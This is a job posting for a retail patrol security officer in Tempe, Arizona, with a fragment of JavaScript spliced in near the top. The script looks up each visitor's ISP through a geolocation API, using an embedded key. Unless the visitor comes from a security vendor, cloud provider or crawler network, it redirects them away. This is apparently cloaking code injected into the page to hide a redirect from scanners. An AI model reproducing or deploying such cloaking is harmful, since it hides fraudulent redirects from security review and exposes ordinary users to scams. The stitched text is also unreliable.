Security Officer – Retail Patrol Driver
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Security Officer - Retail Patrol Driver to ensure the safety and security of retail properties in Tempe, Arizona.
Responsibilities include:
- Conduct regular patrols of retail locations via company vehicle to deter theft, vandalism, and unauthorized access.
- Monitor surveillance systems and inspect premises for security breaches or safety hazards.
- Respond promptly to incidents, alarms, and emergencies, providing appropriate action and reporting.
- Engage with employees, customers, and visitors in a professional and courteous manner.
- Complete detailed reports and maintain accurate logs of activities and incidents.
Skills needed:
- Strong observational skills and attention to detail.
- Excellent communication and interpersonal abilities.
- Ability to operate security equipment and a vehicle safely.
- Flexible availability, including evenings, nights, and weekends.
Benefits include:
- Competitive pay and paid training.
- Health and dental insurance options.
- Paid time off and holiday pay.
- Opportunities for career advancement.